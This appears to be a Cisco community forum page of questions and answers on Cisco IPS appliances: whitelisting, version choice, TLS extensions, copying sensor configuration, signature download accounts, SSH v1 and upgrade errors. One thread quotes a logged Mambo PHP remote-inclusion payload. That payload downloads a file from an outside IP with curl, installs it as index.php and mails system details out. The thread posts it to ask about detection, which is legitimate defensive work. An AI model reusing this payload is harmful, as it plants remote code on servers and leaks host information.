Application whitelisting with Cisco IPS

I was wondering, can the Cisco IPS 4360 appliance do application whitelisting?

From my understanding, the action filter is based on source and destination IP address whitelisting?

Hello

That's right, the event action filter is based on the source and the IP addresses; it cannot be used to map a specific application.

Kind regards

Julio

Tags: Cisco Security

Similar Questions

  • Cisco ips 6.2 vs cisco ips 7.0

    Hi all


    I have some experience with cisco IPS, but I want to know are there any differences between these two.

    or someone knows registred bug with this model two problem?

    which one is best? If you want to buy? I need comparison when I go to the docs all have two similar restistiction and the limit, usually for IPv6.


    My goal to choose any! which is better and why?

    If you have an idea please share. and thanks for that!



    Concerning

    Jonathan David

    Always choose the latest version 7.0 IPS because it has new features and bug fixes that have been found in the earlier version.

    BTW, if you buy IPS, you will not buy based on the version because the software comes with it by default, but you can upgrade and downgrade it accordingly if you want.

    There are actually many different models of IPS, and here is the list:

    -IPS 4200 series

    -Module AIP on ASA firewall

    -IOS IPS

    -IDSM2 6500 series Switch

    -AIM or NME IPS on routers

    They all can run the version 6.2 or 7.0 or any other supported in this platform.

  • Not entirely taken TLS supported in Cisco IPS 4240

    I am trying to contact a Cisco IPS 4240 device while having security settings FIPS enabled on the client using SSL. This is not possible because the device does not support TLS extensions in the Client Hello packet (RFC 5746) sent by the client when using TLS (SSL3 and lower are not FIPS compatible). The IDM application that communicates with the device does not send these extensions (I'm seeing this with Wireshark) TLS is able to connect to it.

    Is it possible to provide the 4240 support these TLS extensions?

    This is related to the bugs below.  The original solution will be included in the 7.1.5 release which is preparing to take in charge the platform 4240 among others.  This will allow the Web server IPS to ignore short-term extensions.  The long-term solution will require an update to the Web server so that it is fully compliant with RFC 5746.

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtt18382

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtx43502

    Todd

  • PHP exploit triggers Cisco Security Agent but NOT at Cisco IPS... why?

    Does anyone know which signature this exploit should trigger on the Cisco IPS sensor? Not sure if there is one, or if we turned it off.

    We see this exploit hit our Exchange servers several times during the week.

    The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.

    I think that this could be the exploit of mambo. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on mambo MySDN and found GIS 5163 "Mambo Site Server Administration Password ByPass" here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS can not seen this so it was more than 443.

    Hope this helps

    M

  • Deployment of Cisco IPS 4240 devices

    I can't find any information about mass deployment features for the Cisco IPS 4240. I have 6 devices that I intend to push out to several remote sites and tie into a centralized Cisco MARS unit. Without the help of any CSM/LMS software, is there a quick and dirty way to pull this off? I am thinking of setting up a single IPS appliance, then pulling and distributing the configuration file to the remaining devices. I would like to see how others have done this...

    If all of your sensors are of the same type (all 4240s in your situation) and will all run the exact same configuration, then the copy command will help you out.

    There is a new feature added to the copy command in IPS 6.1 which will help you when copying the config of one sensor to another.

    Completely configure one sensor (using IME, IDM or CLI). When you are satisfied with the configuration, use the copy command to copy it to an SCP server.

    Now bring up a second sensor and configure basic networking through the Installer settings (IP address, gateway, etc.).

    Now, use the copy command to copy the first sensor's configuration from the SCP server into the running configuration of the second sensor.

    It will ask you to change the network settings on the second sensor.

    Answer no.

    The rest of the configuration from the first sensor's copy will be placed on the second sensor.

    The second sensor will keep its own unique IP address but gain the rest of the configuration from the config of the first sensor.

    Continue to do this with additional sensors.

    The process can then be repeated every time that additional changes are made to the first sensor.

    Remember though that this only works if the configuration of the sensor is to be exactly duplicated (including which interfaces are monitored and how).

    If each sensor will have some unique tunings, then you need to manage each sensor on its own or buy CSM which can be used to share only parts of the configuration of multiple sensors.

  • user account to download Cisco IPS signature

    Hi all

    I wanted to activate the automatic update in IPS but it asks for a Cisco VAC with cryptographic privileges to download Cisco IPS signature and signature engine updates from Cisco.com.

    is their any default access for this?

    I have VAC ORC is if this can be used?

    You must have a Cisco.com user with privileges to download Cisco IPS signature and signature updates cryptographic engine of Cisco.com.

    Using your cisco.com account, go to this link and see if you can download the IPS-K9-6.1-2-E3.pkg to your own desktop machine.

    http://tools.cisco.com/support/downloads/go/ImageList.x?relVer=6.1%282%29E3&mdfid=280302728&sftType=Intrusion+Prevention+System+%28IPS%29+System+Upgrades&optPlat=&nodecount=2&edesignator=null&modelName=Cisco+IPS+4260+Sensor&treeMdfId=278875311&treeName=Intrusion+Prevention+System+%28IPS%29&modifmdfid=null&imname=&hybrid=Y&imst=N&lr=Y

    If you cannot download this file with your account, then you can use that account and password when you set up the sensor for updates automatic cisco.com.

    If you can not download the file with your account, your account does not have the right settings.

    Your account does not have access crypto or your account is not correctly connected to your service contract for your sensors.

    There are a handful of countries not allowed access crypto, users of other countries would just get their account changed to crypto access (I'm not sure what is this procedure).

  • Recovery v1 in cisco IPS SSL Session key

    Hi all

    In network audit, I have the comment mentioned by the auditor for cisco IPS 4270 device. but I don't get any solution for the same thing. Kindly help me out on this.

    V1 SSL Session key recovery

    The remote SSH daemon supports connections made using the version 1.33 or 1.5 of the SSH Protocol. These protocols are not completely cryptographically safe so they should not be used.

    With respect,

    Sashi

    Currently there is no way to allow only SSH version 2 and disable SSH version 1 on IPS.

    Here is the enhancement request which has been filed, for your reference: CSCsk84977

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsk84977

    Hope that answers your question.

  • Ssm - 20 upgrade: cisco ips canceled upgrade because...

    Hi all

    I have upgraded our ASA 55402 with SSM-20 modules.

    Upgrading a module version 7.0000 E4 to of 6,0000 E4 everything went well.

    However, the other returned the following error when you try to upgrade the image and recovery partition:

    -cisco ips update cancelled because another upgrade or downgrade is underway

    The firewall that I intend to do the upgrade is passive.

    Firmware ASA: v9.1.1.

    Search Internet and this forum.

    Everyone fell on this?

    Thanx

    Jaap

    "Reset the hw-module module 1": it causes no problems at all.

  • Does anyone have a guide to the Cisco IPS Manager Express Administrator?

    Hello.

    Does anyone have a guide to the administrator of the Cisco IPS Manager Express?, I need to update my license some a procedure?, if I have an IPS with Bypass the configuration at the time of the closing of SPI interfaces will license update or will have no affection?

    Thank you.

    Here you will find guides - everything depends on your version:

    http://www.Cisco.com/en/us/products/HW/vpndevc/PS4077/products_installation_and_configuration_guides_list.html

    For example, here is the 7.1 version SEO licenses:

    http://www.Cisco.com/en/us/docs/security/IPS/7.1/Configuration/Guide/IME/ime_sensor_management.html#wp2219086

    Apply a license will not stop interfaces... However, if you apply an update of the signature, you'll stop traffic for a short time during the installation of the signatures up-to-date inspection.

    Hope that helps.

  • Compatibility of VLAN with Cisco

    Hello

    We just bought 10 x new Netgear switches (all M4100) to add to an existing Cisco infrastructure.

    Simple configuration with only 6 VLANs.

    5: Admin, 30: VOIP, 101: management, 100: a set of Workstations, 102: second series of Workstations, 200: IPTV, 400: Internet, 401: Wireless Management

    All I wanted to do was: 2 last ports each switch netgear = T and all the VLANS. I have not identified all ports if I want to use in the appropriate vlan

    VLAN 101 is my Management VLAN. (Need to configure inter-VLAN routing for this to work)

    I only turned on three switches up to now and all three do not work. They work for a while and that packets but do not receive all.

    What I am doing wrong?

    What I need to get rid of the original vlan1 on the netgear?

    Is that what I need config in the STP to make these compatible with Cisco (300 and 400 series) switches.

    I use an optical backbone on Cisco and Netgear switches.

    Sincere greetings,

    OLAF

    Hi Moussa,

    Thanks for reaching out.

    We got it working.

    Step 1: upgrade to the latest firmware.

    Step 2: Forget the GUI.

    We had a few questions about the old firmware - causing links to trunk have some incompatibility with their tag and removed the images between Cisco and Netgear brand.

    After the upgrade of the firmware that we had access to "switchport mode access" and "switchport mode trunk" orders fixing the access port and trunking issues.

    Thank you Mr President,

    OLAF

  • Problem with Photos Soft - error message the application built with PhotoLibraryPrivate version 215.65.00 but works with version 209.52.00

    Hello, hope someone can help with my MacBook Pro sluggish.

    I'm in OS X Yosemite 10.10.3 version and tried to upgrade to El Capitan 10.10.5 on a Macbook Pro 13inc mid-2012.  He said it has already downloaded twice, but when I open the software it is still sitting at 10.10.3 without modification, download seems to take a lot of time - been sitting for about 6 hours.

    Now I trying to open the photos app but get the following error coming - the application built with PhotoLibraryPrivate version 215.65.00 but works with version 209.52.00.

    Any advice on what are the options for my new photos app! Have you tried different time machine backups and the computer does not like it either

    Upgrade to El Capitan OS X 10.11.2 which includes Photos 1.3

    I have no idea what you are seeing as "El Capitan 10.10.5"; as far as I know it does not exist

    LN

  • On closure of my MacBook Pro always get question "continue application"? with the boxes option to cancel or continue the request.

    On my Mac Book Pro to always stop get question "continue application"? with the boxes option to cancel or continue the request.

    Selection of abandonment does not prevent the following message appears when closing next down.

    Activity monitor shows all the applications that you have installed, running in the background? Something can be...

    If you open the force quit, are there topics other than the Finder and maybe a browser?

    You repaired the disk from disk utility permissions lately?

    We could also see other boot options on the use in Recovery of OS X to use the "OS X Utilities" in there. Be careful.

    Is there more than one user account on your computer? If you Start in another user account and have auto login for the fact that it is one that rises at the start, a piece similar issues or is it just works fine on shut down?

    The question may take some trial and error troubleshooting. This may include some basic startup keyboard shortcuts for the computer to start in Safe Mode, to do more test, etc.

    If you have access to an official Apple store, you can be able to set up an engineering appointment & have someone closer.

    Good luck anyway...

  • Applications installed with device drivers OR

    I bought a few applications that have been written entirely in LabVIEW that also use data acquisition OR PXI cards.  Before the installation, I installed the drivers of devices OR newer.  I discovered that more than 70 applications installed with the drivers.  Where can I learn what do each of these applications?  I need this information because, in order for me to install device drivers OR on my networked computers, I need to know what my local network vulnerabilities could be introduced with these applications.  If anyone can help?  I enclose a list of executables (*.exe) installed in the C:\Program NIUninstaller Instruments\ folder only.

    Hi USAARL.

    I follow with you on a private message. As mentioned, we have what you ask because well documented right now, it's something we will address actively. We are having this type of information will be documented and available to all users soon. Please, followed in the manner specified in the private message.

  • All 32-bit applications crash with error 0xc000005 after windows Server 2008 R2 backup

    Hello world...

    I am in a big mess... and really need help!

    I did last night a Backup windows... but one of my users were connected to the server works with applications...

    and this morning No 32 no bits applications... same installer...
    the 64-bit application works very well...

    Others or generating an error 0xc000005 and stop...
    failing Ole32.dll module...

    And I'm sure that the backup is reliable, even if the backup of windows said it was successful...

    I tried to restore only the apps files... but it seems more complicated than that...

    If anyone has an idea...

    Hi, Emeric,

    Thanks for posting the question on Microsoft Community.

    According to the description, it seems that 32-bit applications crash with an 0xc000005 error code in Windows Server 2008.

    As the question more appropriate forums Technet, write the topic in this forum for better support.

    http://social.technet.Microsoft.com/forums/en-us/WindowsBackup/threads

    Using the windows-related issues feel free to post on Microsoft Community.

  • MsiError 1627 then install application created with labview 2009

    Hello

    I tried to install an application created with labview 2009, I have this fatal error ' MsiError 1627: 1: 2727 2: UsFile.

    Executable works fine while the installer does not work!

    UsFile is a Lvclass. I don't understand why I have this message.

    Thank you very much.

    Hi thanks for the reply,

    I don't delete the installation program. It has not been disabled or corrupted MSI.

    Problem is in the source file: ProgramFilesFolder was not also identical to my request. So I refreshed that (the folder UsFile appeared not in ProgramFilesFolder).

    Now it works!

    Thank you very much Bye
